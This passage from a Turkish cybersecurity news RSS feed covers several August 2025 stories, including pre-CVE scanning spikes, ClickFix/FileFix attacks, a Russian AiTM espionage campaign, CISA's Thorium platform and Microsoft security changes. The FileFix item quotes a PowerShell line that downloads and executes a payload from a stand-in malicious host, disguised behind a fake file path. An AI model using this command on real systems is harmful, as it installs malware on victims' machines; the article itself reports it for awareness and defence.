                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_689118a5ee754.webp" length="69198" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 10:42:44 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>yeni CVE’ler öncesinde neler yaşanıyor, ağ tarama faaliyetleri nasıl analiz ediliyor, saldırganlar eski açıkları neden hâlâ kullanıyor, güvenlik açıklarına karşı erken uyarı nasıl mümkün olabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="font-weight: bold; font-size: 32px; color: #0078d4; margin-bottom: 22px;">GreyNoise Analizi: Güvenlik Açığı Duyuruları Öncesinde Ağ Trafiğinde Anormal Artış</h2>
<p style="font-size: 17px; margin-bottom: 20px;">Siber tehdit istihbarat firması <strong>GreyNoise</strong>, 2024 yılından bu yana topladığı verilerle gerçekleştirdiği analizde, güvenlik açıkları kamuya duyurulmadan önce geçen altı haftalık sürede ağ trafiğinde olağan dışı bir artış olduğunu tespit etti. Şirketin verilerine göre, incelenen olayların %80’inde, CVE (Common Vulnerabilities and Exposures) açıklamaları öncesinde saldırgan faaliyetlerinde ani sıçramalar yaşanıyor.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Araştırmada kullanılan veriler, GreyNoise’un küresel tarama verileri sağlayan <em>Global Observation Grid (GOG)</em> platformundan elde edildi. İstatistiksel güvenilirlik sağlamak adına düşük kaliteli ve gürültülü veriler analiz dışı bırakıldı ve toplam 216 anormal trafik olayı değerlendirmeye alındı. Bu olaylar, aralarında Ivanti, SonicWall, Palo Alto Networks, Fortinet, MikroTik, Citrix ve Cisco gibi sekiz büyük uç ağ cihazı üreticisini kapsıyor.</p>
<p style="font-size: 17px; margin-bottom: 20px;">GreyNoise, “İncelediğimiz 216 trafik artışının %50’si üç hafta içinde, %80’i ise altı hafta içinde yeni bir güvenlik açığı duyurusu ile sonuçlandı.” açıklamasında bulundu.</p>
<h3 style="font-weight: 600; font-size: 22px; color: #0078d4; margin-bottom: 14px;">Eski Açıklar Taranıyor, Yeni Saldırılar Hazırlanıyor</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Araştırmacılara göre bu trafik artışları genellikle daha önce bilinen açıklara yönelik taramalardan oluşuyor. Ancak bu taramaların amacı sadece bu eski açıkları sömürmek değil, aynı zamanda yeni zafiyetlerin keşfi ya da ağa açık sistemlerin haritalanması gibi sonraki aşamalar için zemin hazırlamak.</p>
<h3 style="font-weight: 600; font-size: 22px; color: #0078d4; margin-bottom: 14px;">Savunma İçin Erken Uyarı Mekanizması</h3>
<p style="font-size: 17px; margin-bottom: 20px;">GreyNoise, bu tür trafik artışlarının savunma ekipleri için bir tür “erken uyarı” niteliği taşıdığını belirtiyor. Bu sayede, bir güvenlik yaması yayınlanmamış olsa dahi sistem yöneticileri önceden hazırlık yapabiliyor, izleme sistemlerini güçlendirebiliyor ve riskli IP’leri kara listeye alabiliyor.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Özellikle devlet destekli tehdit gruplarının, uç nokta cihazlarını ilk erişim ve kalıcılık amacıyla hedef aldığı biliniyor. Bu da ağ üzerindeki anormal hareketliliklerin göz ardı edilmemesi gerektiğini gösteriyor.</p>
<h3 style="font-weight: 600; font-size: 22px; color: #0078d4; margin-bottom: 14px;">Google Project Zero’dan Paralel Adım</h3>
<p style="font-size: 17px;">Bu gelişmeyle eş zamanlı olarak, Google’ın Project Zero ekibi de önemli bir politika değişikliğini duyurdu. Buna göre yeni bir güvenlik açığı tespit edildiğinde, artık teknik detay verilmeden yalnızca hangi ürünün etkilendiği, ne zaman keşfedildiği ve açıklama süresi gibi temel bilgiler bir hafta içinde kamuoyuyla paylaşılacak. Amaç, yazılım tedarikçileri güncelleme hazırlarken sistem yöneticilerinin savunmasını hızla güçlendirebilmesini sağlamak.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ClickFix ve FileFix saldırıları, tarayıcıdan işletim sistemine uzanan yeni sosyal mühendislik tehditlerini ortaya koyuyor</title>
            <link>https://cumha.com.tr/clickfix-ve-filefix-saldirilari-tarayicidan-isletim-sistemine-uzanan-yeni-sosyal-muhendislik-tehditlerini-ortaya-koyuyor</link>
            <guid>https://cumha.com.tr/clickfix-ve-filefix-saldirilari-tarayicidan-isletim-sistemine-uzanan-yeni-sosyal-muhendislik-tehditlerini-ortaya-koyuyor</guid>
            <description><![CDATA[ ClickFix adı verilen yeni nesil sosyal mühendislik saldırıları, kullanıcıların tarayıcıdan panoya kopyalanan zararlı komutları kendi elleriyle çalıştırmalarını sağlıyor. Son varyantı FileFix ile birlikte bu teknikler, sistemde uzaktan erişim truva atları, veri hırsızları ve kalıcı kötü amaçlı yazılımlar oluşturmak için kullanılabiliyor. Uzmanlar, bu tehditlerin ancak tarayıcı düzeyinde gerçek zamanlı korumayla durdurulabileceğini belirtiyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68911856a832b.webp" length="46414" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 10:42:05 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>ClickFix saldırısı nasıl çalışıyor, FileFix tekniği nasıl işliyor, zararlı kodlar tarayıcıdan işletim sistemine nasıl geçiyor, tarayıcı tabanlı güvenlik çözümleri ne işe yarıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="font-weight: bold; font-size: 32px; color: #0078d4; margin-bottom: 22px;">Keep Aware’dan ClickFix ve FileFix Saldırılarına Dair Yeni Analiz</h2>
<p style="font-size: 17px; margin-bottom: 20px;">Siber güvenlik platformu <strong>Keep Aware</strong> tarafından yayımlanan yeni bir analiz, <strong>ClickFix</strong> olarak adlandırılan tarayıcı kaynaklı sosyal mühendislik saldırısının detaylarını ortaya koydu. Bu saldırılar, kullanıcıların farkında olmadan tarayıcıdan panoya kopyalanan zararlı kodları çalıştırmalarına neden olarak sistemin ele geçirilmesine zemin hazırlıyor.</p>
<h3 style="font-weight: 600; font-size: 22px; color: #0078d4; margin-bottom: 14px;">Sessiz Tehdit: ClickFix Nedir</h3>
<p style="font-size: 17px; margin-bottom: 20px;">ClickFix saldırıları, genellikle sahte CAPTCHA doğrulamaları gibi kullanıcıdan "bir şeyi düzeltmesi" istenen görseller üzerinden başlatılıyor. Kullanıcı bir öğeye tıkladığında, tarayıcı sessizce panoya zararlı PowerShell komutları kopyalıyor. Ardından kullanıcıya bu kodu terminale yapıştırması gerektiği söyleniyor. Bu işlem, kötü amaçlı yazılımın çalıştırılmasına neden oluyor.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Keep Aware tarafından paylaşılan gerçek bir vaka analizinde, bir kullanıcı arama motoru sonuçlarında karşılaştığı bir siteye tıkladıktan sonra ClickFix saldırısına maruz kaldı. Sayfa, panoya NetSupport Manager uzaktan erişim truva atı içeren PowerShell kodunu kopyaladı ve çalıştırılması yönünde kullanıcıyı yönlendirdi. Keep Aware’ın tarayıcı güvenlik çözümleri sayesinde saldırı gerçekleşmeden engellendi.</p>
<h3 style="font-weight: 600; font-size: 22px; color: #0078d4; margin-bottom: 14px;">Yeni Varyant: FileFix</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Haziran 2025'te araştırmacı mr.d0x tarafından belgelenen <strong>FileFix</strong>, ClickFix’in gelişmiş bir versiyonu olarak ortaya çıktı. FileFix’te kullanıcı, panoya gizlenmiş PowerShell komutlarını doğrudan Windows Dosya Gezgini'nin adres çubuğuna yapıştırmaya ikna ediliyor. Komutun ardından gelen dosya yolu yorum satırı olarak ekleniyor ve tehdit gizleniyor:</p>
<pre style="background: #f4f4f4; padding: 14px 18px; border-radius: 8px; font-size: 15px; line-height: 1.4; overflow-x: auto; color: #c7254e;">Powershell.exe -c "iwr malicious[.]site/mal.jpg|iex" # C:\Organization\Internal\Drive\Business-RFP.pdf
  </pre>
<p style="font-size: 17px; margin-bottom: 20px;">Bu tür saldırılarda, kullanıcının zararlı kodu fark etmesi zorlaşıyor çünkü adres çubuğu yalnızca dosya yolu kısmını gösteriyor.</p>
<h3 style="font-weight: 600; font-size: 22px; color: #0078d4; margin-bottom: 14px;">Kalıcı Tehdit: RAT ve Stealer Yüklemeleri</h3>
<p style="font-size: 17px; margin-bottom: 20px;">ClickFix ve FileFix saldırıları, kullanıcıyı aktif olarak kodu çalıştırmaya yönlendirerek AsyncRAT, Lumma Stealer, DarkGate, DanaBot gibi kötü amaçlı yazılımların sisteme yerleşmesini sağlıyor. Panoya kopyalanan kod, indirilen dosyaları açıyor, çözümleyerek sistemde kalıcılık sağlayan arka kapılar kuruyor.</p>
<h3 style="font-weight: 600; font-size: 22px; color: #0078d4; margin-bottom: 14px;">Koruma Nereden Başlamalı</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Uzmanlara göre bu tür saldırılar, klasik antivirüs ve güvenlik duvarı çözümlerini aşabiliyor. Bu nedenle tarayıcı düzeyinde, panoya erişimi izleyen ve zararlı komutları gerçek zamanlı engelleyen çözümler kullanılmalı. Keep Aware, ClickFix ve FileFix saldırılarını tarayıcıda tespit ederek henüz çalıştırılmadan durdurabildiğini belirtiyor.</p>
<h3 style="font-weight: 600; font-size: 22px; color: #0078d4; margin-bottom: 14px;">Tarayıcı Güvenliği Öncelik Haline Geliyor</h3>
<p style="font-size: 17px;">Keep Aware, bu saldırıların güvenlik stratejilerindeki en büyük açık olan tarayıcı alanını hedef aldığını vurguluyor. Şirket, bu nedenle tarayıcı merkezli güvenlik yaklaşımı geliştirdiklerini ve Black Hat USA 2025 etkinliğinde sunum yapacak dört Startup Spotlight finalistinden biri seçildiklerini açıkladı.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Microsoft: Rusya bağlantılı hacker grubu, Moskova’daki büyükelçilikleri ISP düzeyinde yürütülen AiTM saldırılarıyla hedef alıyor</title>
            <link>https://cumha.com.tr/microsoft-rusya-baglantili-hacker-grubu-moskovadaki-buyukelcilikleri-isp-duzeyinde-yurutulen-aitm-saldirilariyla-hedef-aliyor</link>
            <guid>https://cumha.com.tr/microsoft-rusya-baglantili-hacker-grubu-moskovadaki-buyukelcilikleri-isp-duzeyinde-yurutulen-aitm-saldirilariyla-hedef-aliyor</guid>
            <description><![CDATA[ Microsoft, Rusya Federal Güvenlik Servisi (FSB) ile bağlantılı Secret Blizzard isimli hacker grubunun, Moskova’daki diplomatik misyonları yerel internet servis sağlayıcıları (ISP) üzerinden düzenlenen &quot;adversary-in-the-middle&quot; saldırılarıyla hedef aldığını açıkladı. Grup, sahte antivirüs yazılımı yoluyla kötü amaçlı ApolloShadow zararlı yazılımını sistemlere sızdırıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_6891187006cdc.webp" length="60554" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 10:41:21 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Secret Blizzard grubu kimdir, AiTM saldırıları nasıl gerçekleştiriliyor, ApolloShadow zararlısı ne işe yarıyor, Rusya’daki diplomatik misyonlar hangi siber tehditlerle karşı karşıya</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="font-weight: bold; font-size: 32px; color: #0b66c2; margin-bottom: 22px;">Microsoft, Secret Blizzard Siber Casusluk Grubunun Yeni AiTM Kampanyasını Açıkladı</h2>
<p style="font-size: 17px; margin-bottom: 20px;">Microsoft, Rusya merkezli siber casusluk grubu <strong>Secret Blizzard</strong>’ın, Moskova’daki diplomatik temsilcilikleri hedef alan yeni bir siber kampanya yürüttüğünü açıkladı. Grup, yerel internet servis sağlayıcılarının altyapısını kullanarak <em>adversary-in-the-middle (AiTM)</em> saldırıları gerçekleştiriyor.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Microsoft’un daha önce <em>Turla, Waterbug</em> ve <em>Venomous Bear</em> gibi adlarla da takip ettiği bu grup, hedef kullanıcıları sahte Kaspersky antivirüs yükleyicisiyle kandırarak <strong>ApolloShadow</strong> adlı özel zararlı yazılımı sistemlere yerleştiriyor. Saldırının temel yöntemi, kurbanları captive portal’lara yönlendirmek ve buradan kötü amaçlı dosyaları indirmeye zorlamak.</p>
<p style="font-size: 17px; margin-bottom: 20px;">ApolloShadow sistemlere yüklendikten sonra, sahte bir Kaspersky root sertifikası da kuruyor. Bu sertifika, saldırganların zararlı siteleri meşru gibi göstermesini sağlıyor ve sistemde kalıcı erişim elde etmelerine imkân tanıyor.</p>
<p style="font-style: italic; font-size: 16.5px; margin-bottom: 25px; color: #555;">Microsoft, “Bu, Secret Blizzard grubunun ISP düzeyinde istihbarat toplama yeteneğini ilk kez doğruladığımız bir örnektir. Rusya’daki yerel internet sağlayıcılarını kullanan diplomatik personel, yüksek risk altındadır.” açıklamasında bulundu.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Saldırı zincirinin Şubat 2025'te tespit edildiği, ancak kampanyanın en azından 2024’ten bu yana aktif olduğu belirtiliyor. Microsoft ayrıca, saldırganların Rusya’daki resmi gözetim altyapısı <strong>SORM</strong> (System for Operative Investigative Activities) üzerinden AiTM saldırılarını yaygınlaştırdığını belirtti.</p>
<h3 style="font-weight: 600; font-size: 22px; color: #0b66c2; margin-bottom: 14px;">Yüksek Profilli Hedeflere Yönelik Sıra Dışı Taktikler</h3>
<p style="font-size: 17px; margin-bottom: 20px;">Secret Blizzard, 1996'dan bu yana dünya genelinde 100'den fazla ülkede elçilikleri, devlet kurumlarını ve araştırma merkezlerini hedef alan siber casusluk faaliyetleri yürütüyor. Grup, iki yıl önce ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) tarafından FSB’nin 16. Merkezi ile ilişkilendirilmişti.</p>
<p style="font-size: 17px; margin-bottom: 20px;">Geçmişte, Britney Spears’ın Instagram gönderilerine yazılan yorumlar üzerinden kötü amaçlı yazılımları kontrol ettikleri ve İranlı APT grubu OilRig'in altyapısını kullanarak saldırılarını gizlemeye çalıştıkları tespit edilmişti. Ayrıca, yakın zamanda Pakistanlı Storm-0156 grubunun altyapısını ele geçirerek Ukrayna askeri cihazlarını Starlink bağlantıları üzerinden hedef aldıkları bildirildi.</p>
<p style="font-size: 17px; margin-bottom: 25px;">Secret Blizzard grubunun, ABD Merkez Kuvvetler Komutanlığı (CENTCOM), NASA, Pentagon, Finlandiya Dışişleri Bakanlığı, AB devletleri ve büyükelçiliklerini de hedef aldığı biliniyor.</p>
<p style="font-size: 17px;">Microsoft, özellikle diplomatik kurumlar ve yerel ağ altyapısına bağlı çalışan tüm kuruluşlar için <strong>ciddi güvenlik önlemleri</strong> alınması gerektiğini vurguladı.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>CISA, Zararlı Yazılım ve Adli Analiz İçin Geliştirilen Thorium Platformunu Açık Kaynak Olarak Yayınladı</title>
            <link>https://cumha.com.tr/cisa-zararli-yazilim-ve-adli-analiz-icin-gelistirilen-thorium-platformunu-acik-kaynak-olarak-yayinladi</link>
            <guid>https://cumha.com.tr/cisa-zararli-yazilim-ve-adli-analiz-icin-gelistirilen-thorium-platformunu-acik-kaynak-olarak-yayinladi</guid>
            <description><![CDATA[ ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), Sandia Ulusal Laboratuvarları ile ortaklaşa geliştirilen Thorium adlı analiz platformunu açık kaynak olarak paylaştı. Platform, kamu ve özel sektördeki siber güvenlik uzmanlarının kötü amaçlı yazılım analizini ve olay müdahalesini otomatikleştirerek hızlandırmayı hedefliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_689119da1cc41.webp" length="46092" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 10:40:20 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Thorium platformu ne işe yarıyor, CISA Thorium’u neden açık kaynak yaptı, kötü amaçlı yazılım analizi nasıl otomatikleştiriliyor, Thorium hangi teknolojileri kullanıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="color: #0b66c2; font-weight: bold; font-size: 30px; margin-bottom: 22px;">CISA, Thorium Platformunu Açık Kaynak Olarak Yayınladı</h2>
<p style="font-size: 17px; margin-bottom: 18px;">ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), kötü amaçlı yazılım ve dijital adli analiz süreçlerini otomatikleştirmeye yönelik geliştirilen <strong>Thorium</strong> platformunun açık kaynak olarak yayınlandığını duyurdu. Thorium, kamu, özel sektör ve devlet kurumlarındaki siber güvenlik uzmanlarına yönelik olarak geliştirildi.</p>
<p style="font-size: 17px; margin-bottom: 18px;">Thorium, CISA ile Sandia Ulusal Laboratuvarları iş birliğiyle geliştirildi ve saniyede <strong style="color: #d94848;">1.700'den fazla işlem</strong> planlayabilme ve saatlik <strong style="color: #d94848;">10 milyon dosya</strong> işleyebilme kapasitesine sahip. Bu altyapı, analiz süreçlerinde yüksek ölçeklenebilirlik ve hız sunuyor.</p>
<p style="font-size: 17px; font-style: italic; margin-bottom: 20px; color: #444;">CISA açıklamasında, “Thorium, ticari, açık kaynaklı ve kuruma özel analiz araçlarını entegre ederek analiz iş akışlarını otomatikleştiriyor. Yazılım analizi, dijital adli inceleme ve olay müdahalesi gibi görevlerde güvenlik ekiplerine kapsamlı destek sağlıyor.” ifadelerine yer verildi.</p>
<p style="font-weight: 600; font-size: 18px; margin-bottom: 14px; color: #0b66c2;">Thorium’un Temel Özellikleri:</p>
<ul style="margin: 0 0 22px 20px; font-size: 17px; color: #333;">
<li>Açık kaynak, ticari veya özel komut satırı araçlarının Docker görüntüleri olarak kolayca entegre edilmesi</li>
<li>Araç ve sonuç paylaşımını kolaylaştıran içe/dışa aktarma özellikleri</li>
<li>Etiketleme ve tam metin aramayla sonuç filtreleme</li>
<li>Erişim kontrolleri için grup tabanlı yetkilendirme</li>
<li>Kubernetes ve ScyllaDB entegrasyonu ile ölçeklenebilir yapı</li>
</ul>
<p style="font-size: 17px; margin-bottom: 18px;">CISA Tehdit Avcılığı Başkan Yardımcısı <strong>Jermaine Roebuck</strong>, “Thorium’u açık kaynak olarak sunarak, siber güvenlik topluluğunun zararlı yazılım ve adli analiz için gelişmiş araçları daha etkili şekilde kullanmasını sağlıyoruz.” dedi. Roebuck ayrıca, platformun sadece zararlı yazılımlar değil, potansiyel olarak güvenli yazılımlardaki zafiyetleri de analiz etme olanağı sunduğunu vurguladı.</p>
<p style="font-size: 17px; margin-bottom: 18px;">Thorium’a ait kurulum dökümanları ve kaynak kodları CISA’nın resmî GitHub hesabı üzerinden erişime açıldı.</p>
<p style="font-size: 17px;">CISA, bu adımı geçtiğimiz yıl açık kaynak olarak yayımladığı <em>Malware Next-Gen</em> analiz sistemi ve bu hafta duyurduğu <em>Eviction Strategies Tool</em> ile destekledi. Ajans ayrıca kritik altyapı tesislerine yönelik ücretsiz güvenlik taramaları sunmaya da devam ediyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Microsoft, .NET ve ASP.NET Core açıkları için ödül miktarını 40.000 dolara çıkardı</title>
            <link>https://cumha.com.tr/microsoft-net-ve-aspnet-core-aciklari-icin-oedul-miktarini-40000-dolara-cikardi</link>
            <guid>https://cumha.com.tr/microsoft-net-ve-aspnet-core-aciklari-icin-oedul-miktarini-40000-dolara-cikardi</guid>
            <description><![CDATA[ Microsoft, .NET hata ödül programını genişletti ve kritik güvenlik açıkları için ödül üst limitini 40.000 dolara yükseltti. Yeni program, kapsamı ve ödül yapısını sadeleştirerek araştırmacılara daha cazip bir sistem sunmayı hedefliyor. Gelişme, şirketin &quot;Güvenli Gelecek İnisiyatifi&quot; kapsamında atılan adımlardan biri. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_689119e7c5728.webp" length="28640" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 10:39:33 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>.NET hata ödül programı ne kadar ödül veriyor, hangi güvenlik açıkları ödül kapsamına alındı, Microsoft’un güvenlik stratejisi nasıl değişiyor, ödül programı hangi teknolojileri kapsıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="color: #0067c5; font-weight: bold; font-size: 28px; margin-bottom: 20px;">Microsoft, .NET ve ASP.NET Core Güvenlik Ödüllerini Artırdı</h2>
<p style="font-size: 17px; margin-bottom: 18px;">Microsoft, .NET ve ASP.NET Core platformlarındaki güvenlik açıklarını tespit eden araştırmacılar için ödül miktarlarını artırdığını ve hata ödül programının kapsamını genişlettiğini duyurdu. Yeni sistemle birlikte, kritik uzaktan kod çalıştırma ve ayrıcalık yükseltme açıkları için ödül miktarı <strong style="color: #d14836;">40.000 dolara</strong> kadar çıkabilecek.</p>
<p style="font-size: 17px; margin-bottom: 18px;">Microsoft’ta Araştırmacı Teşvikleri ve Ödül Programları Kıdemli Yöneticisi <strong>Madeline Eckert</strong>, yapılan değişikliklerin, .NET güvenlik açıklarının keşfi ve sömürülmesindeki teknik karmaşıklığın daha doğru bir şekilde yansıtılmasını amaçladığını belirtti.</p>
<p style="font-size: 17px; font-weight: 600; margin-bottom: 12px; color: #004a9f;">Yeni Ödül Yapısı:</p>
<ul style="margin: 0 0 20px 20px; font-size: 17px; color: #333;">
<li><strong>40.000 dolar:</strong> Kritik uzaktan kod çalıştırma ve ayrıcalık yükseltme açıkları</li>
<li><strong>30.000 dolar:</strong> Güvenlik özelliklerini atlatmaya yönelik kritik açıklar</li>
<li><strong>20.000 dolara kadar:</strong> Uzaktan hizmet dışı bırakma (DoS) türündeki kritik açıklar</li>
</ul>
<p style="font-size: 17px; font-weight: 600; margin-bottom: 12px; color: #004a9f;">Ödül Programına Yeni Dahil Edilen Teknolojiler:</p>
<ul style="margin: 0 0 20px 20px; font-size: 17px; color: #333;">
<li>Tüm desteklenen .NET ve ASP.NET sürümleri</li>
<li>F# gibi ilişkili teknolojiler</li>
<li>.NET Framework için desteklenen ASP.NET Core sürümleri</li>
<li>Resmi şablonlar</li>
<li>.NET ve ASP.NET Core GitHub depolarında yer alan GitHub Actions bileşenleri</li>
</ul>
<p style="font-size: 17px; margin-bottom: 18px;">Bu gelişme, Microsoft’un 2023 yılında başlattığı "<em>Secure Future Initiative (SFI)</em>" adlı güvenlik mühendisliği planı kapsamında atılan adımlardan biri olarak öne çıkıyor. Program, şirketin yazılım ürünlerinde güvenliği artırmak amacıyla geliştirdiği uzun vadeli stratejinin bir parçası.</p>
<p style="font-size: 17px; margin-bottom: 18px;">2025 yılı içinde Microsoft ayrıca Power Platform ve Dynamics 365 ürünlerinde yapay zekâ güvenlik açıklarına yönelik ödülleri <strong style="color: #d14836;">30.000 dolara</strong> çıkarmış, Copilot için orta düzey güvenlik açıklarına verilen ödülleri artırmış ve tüm Copilot açıkları için <strong>%100 ödül çarpanı</strong> uygulamaya başlamıştı.</p>
<p style="font-size: 17px; margin-bottom: 18px;">Şirket geçen yıl düzenlediği Ignite konferansında bulut ve yapay zekâ sistemlerine odaklanan "<em>Zero Day Quest</em>" isimli bir etkinlik düzenlemiş, toplamda <strong style="color: #d14836;">4 milyon dolarlık</strong> ödül havuzu açıklamıştı.</p>
<p style="font-size: 17px;">Bu adımlar, ABD İç Güvenlik Bakanlığı'nın 2023 sonunda yayımladığı ve Microsoft’un güvenlik kültürünü “yetersiz” olarak nitelendiren raporunun ardından hayata geçirilen yapısal değişikliklerin parçası olarak değerlendiriliyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Microsoft, Excel’de Yüksek Riskli Dosyalara Verilen Dış Bağlantıları Aşamalı Olarak Devre Dışı Bırakacak</title>
            <link>https://cumha.com.tr/microsoft-excelde-yuksek-riskli-dosyalara-verilen-dis-baglantilari-asamali-olarak-devre-disi-birakacak</link>
            <guid>https://cumha.com.tr/microsoft-excelde-yuksek-riskli-dosyalara-verilen-dis-baglantilari-asamali-olarak-devre-disi-birakacak</guid>
            <description><![CDATA[ Microsoft, Ekim 2025’ten itibaren Excel’de engellenen dosya türlerine verilen dış bağlantıları varsayılan olarak engellemeye başlayacak. Bu değişiklik, güvenlik açıklarını azaltmayı ve kötü amaçlı yazılım risklerini önlemeyi hedefliyor. Yeni ayar, grup ilkesi ve kayıt defteri üzerinden yönetilebilecek. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_689119f6838e2.webp" length="29426" type="image/webp"/>
            
            <pubDate>Fri, 01 Aug 2025 10:38:47 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Excel dış bağlantı güvenliği nasıl değişecek, engellenen dosya türleri hangileri, yeni grup ilkesi nasıl yapılandırılacak</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h2 style="font-size: 26px; font-weight: bold; color: #0078d7; margin-bottom: 15px;">Microsoft, Excel'de Yeni Güvenlik Önlemi Getiriyor</h2>
<p style="font-size: 17px; margin-bottom: 15px;">Microsoft, Excel kullanıcılarını etkileyen yeni bir güvenlik önlemini hayata geçireceğini duyurdu. 2025 yılı Ekim ayından başlayarak, 2026 Temmuz ayına kadar sürecek aşamalı bir dağıtımla, Excel çalışma kitaplarında engellenen dosya türlerine verilen dış bağlantılar varsayılan olarak devre dışı bırakılacak.</p>
<p style="font-size: 17px; margin-bottom: 15px;">Bu değişiklik, Microsoft 365 içinde yeni sunulan <code style="background: #f3f4f6; padding: 2px 6px; border-radius: 4px; font-family: monospace;">FileBlockExternalLinks</code> grup ilkesi kapsamında uygulanacak. Politika etkinleştirildiğinde ya da yapılandırılmadığında, engellenmiş dosya türlerine yapılacak dış bağlantılar çalışma kitabında <span style="color: #d14343; font-weight: 600;">"#BLOCKED"</span> hatası gösterecek veya bağlantı yenileme işlemi başarısız olacak.</p>
<p style="font-size: 17px; margin-bottom: 15px;">Microsoft, çarşamba günü Microsoft 365 yönetici merkezinde yayımladığı açıklamada, bu yeni davranışı kullanıcıların önceden fark edebilmesi için Excel’in <strong>Build 2509</strong> sürümüyle birlikte uyarı çubuğu göstermeye başlayacağını bildirdi. <strong>Build 2510</strong> sürümünden itibaren ise politika yapılandırılmamışsa dış bağlantıların yenilenmesi veya oluşturulması mümkün olmayacak.</p>
<p style="font-size: 17px; margin-bottom: 15px;">Şirket açıklamasında, “Varsayılan ayar yapılandırılmazsa ilk etapta herhangi bir değişiklik olmayacak. Ancak Ekim 2025 itibarıyla Trust Center tarafından halihazırda engellenen dosya türlerine dış bağlantılar otomatik olarak engellenecek.” ifadeleri yer aldı.</p>
<p style="font-size: 17px; margin-bottom: 15px;">Bu değişikliğin etkilerini en aza indirmek isteyen yöneticiler, belirtilen kayıt defteri yolunu kullanarak (<code style="background: #f3f4f6; padding: 2px 6px; border-radius: 4px; font-family: monospace;">HKCU\Software\Microsoft\Office<version>\Excel\Security\FileBlock\FileBlockExternalLinks</version></code>) bağlantı yenileme özelliğini manuel olarak yeniden etkinleştirebilecek.</p>
<p style="font-size: 17px; margin-bottom: 15px;">Microsoft bu politika ile birlikte Excel’deki dış bağlantılar üzerinden yapılan oltalama saldırılarına ve kötü amaçlı yüklemelere karşı önlem almayı hedefliyor. Değişiklik, Microsoft’un son yıllarda Office ve Windows ürünlerinde güvenliği artırmaya yönelik attığı adımların bir parçası.</p>
<p style="font-size: 17px; margin-bottom: 15px;">2025 yılı boyunca Microsoft ayrıca Outlook’ta <code style="background: #f3f4f6; padding: 2px 6px; border-radius: 4px; font-family: monospace;">.library-ms</code> ve <code style="background: #f3f4f6; padding: 2px 6px; border-radius: 4px; font-family: monospace;">.search-ms</code> uzantılarını engellenen ekler listesine eklemiş, Microsoft 365 ve Office 2024 uygulamalarında ActiveX kontrollerini tamamen devre dışı bırakmıştı.</p>
<p style="font-size: 17px; margin-bottom: 15px;">Bu önlemler, Microsoft’un 2018'de Office uygulamalarında Antimalware Scan Interface (AMSI) desteğini genişletmesiyle başlayan daha geniş kapsamlı bir güvenlik stratejisinin devamı niteliğinde. Şirket daha önce Office makrolarını varsayılan olarak engellemiş, XLM makrolarını devre dışı bırakmış, VBScript desteğini sonlandıracağını açıklamış ve güvenilmeyen XLL eklentilerini engellemeye başlamıştı.</p>
<p style="font-size: 17px;">Aynı gün içinde Microsoft, .NET ve ASP.NET Core açıkları için verilen ödül tutarını <strong style="color: #1a73e8;">40.000 dolar</strong> seviyesine çıkardığını da duyurdu.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>XSS.is Forumunun Kapatılmasıyla Uluslararası Siber Suç Ağına Büyük Darbe</title>
            <link>https://cumha.com.tr/xssis-forumunun-kapatilmasiyla-uluslararasi-siber-suc-agina-buyuk-darbe</link>
            <guid>https://cumha.com.tr/xssis-forumunun-kapatilmasiyla-uluslararasi-siber-suc-agina-buyuk-darbe</guid>
            <description><![CDATA[ Ukrayna&#039;nın başkenti Kiev&#039;de gerçekleştirilen uluslararası operasyonla XSS.is forumunun yöneticisi gözaltına alındı. Siber suç faaliyetlerinin merkezlerinden biri olan platform, 50 binden fazla kullanıcıya hizmet veriyordu ve milyonlarca euroluk yasa dışı işlemde rol oynuyordu. ]]></description>

